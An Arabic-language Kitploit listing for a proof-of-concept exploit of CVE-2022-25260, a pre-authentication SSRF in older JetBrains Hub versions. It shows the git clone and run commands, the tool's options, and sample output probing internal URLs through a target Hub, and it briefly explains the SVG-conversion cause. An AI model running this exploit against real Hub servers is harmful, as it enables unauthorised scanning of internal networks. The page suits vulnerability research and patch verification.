Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-25260 — PoC لـ CVE-2022-25260: SSRF شبه أعمى قبل المصادقة في JetBrains Hub | Kitploit
أدوات/GitHubGitHub/yuriisanin/cve-2022-25260
الاستطلاعتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلومات
GitHubyuriisanin/cve-2022-25260

CVE-2022-25260

PoC لـ CVE-2022-25260: SSRF شبه أعمى قبل المصادقة في JetBrains Hub

عرض المستودع
431منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-25260

انتحال طلب الخادم شبه الأعمى قبل المصادقة من JetBrains Hub (SSRF)

المتطلبات

  • JetBrains Hub <2021.1.14276
  • كان JetBrains Hub قبل الإصدار 2021.1.14276 عرضة لضعف التحكم في الوصول (CVE-2022-34894)، مما يسمح للمهاجم بإنشاء خدمات غير موثوقة دون مصادقة حتى لو كان المستخدم الضيف معطلًا. وهذا يجعل من الممكن استغلال الثغرة دون أي متطلبات أخرى (عادةً يجب أن يكون المهاجم على الأقل مصادقًا عليه).

الاستخدام

التثبيت والتشغيل:

root@kitploit:~
$ git clone https://github.com/yuriisanin/CVE-2022-25260
$ cd CVE-2022-25260/
$ python3 exploit.py -h

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
usage: exploit.py [-h] -hub_url HUB_URL -email EMAIL [-internal_urls_file INTERNAL_URLS_FILE] [-internal_url INTERNAL_URL]

optional arguments:
  -h, --help            show this help message and exit
  -hub_url HUB_URL      Target Hub instance
  -email EMAIL          Email address of any user in the system
  -internal_urls_file INTERNAL_URLS_FILE
                        Path to internal service URLs file
  -internal_url INTERNAL_URL
                        Internal service URL
  

الاستخدام:

root@kitploit:~
$ python3 exploit.py hub_url http://localhost:8080 -email [email protected] -internal_urls_file ./assets/payloads/urls.txt

|--------------------------------------------------------------------|
|       CVE-2022-25260 JetBrains Hub pre-auth semi-blind SSRF        |
|           developed by Yurii Sanin (Twitter: @SaninYurii)          |
|--------------------------------------------------------------------|
[INFO] - staring scanning for 14 urls.
[INFO] - trying to create Hub service.
[INFO] - Hub service create, serviceId: '02cc6043-1469-4a8e-9a74-b003e721620c'.
[INFO] - trying to request: 'http://127.0.0.1:8080'.
[INFO] - OK. Host 'http://127.0.0.1:8080' is running HTTP service (XML-like response) [FOUND]. Message: 'Attribute name "ng-strict-di" associated with an element type "html" must be followed by the ' = ' character.'.
[INFO] - trying to request: 'http://127.0.0.1:8081'.
[INFO] - OK. Host 'http://127.0.0.1:8081' is DOWN.
[INFO] - trying to request: 'http://google.com'.
[INFO] - OK. Host 'http://google.com' is running HTTP service (presumably XML-like response) [FOUND]. Message: 'The markup in the document preceding the root element must be well-formed.'.

العرض التوضيحي:

CVE-2022-24342 عرض توضيحي

كيف يعمل؟

كانت الثغرة ممكنة بسبب استخدام Apache Batik بالإعدادات الافتراضية لتحويل أيقونات SVG المقدمة من المستخدم إلى رسوم نقطية. يمكنك العثور على مزيد من المعلومات حول استغلال تحويل SVG من جانب الخادم هنا.

الدعم

يمكنك متابعتي على Twitter أو GitHub أو YouTube.

تنزيل الأداة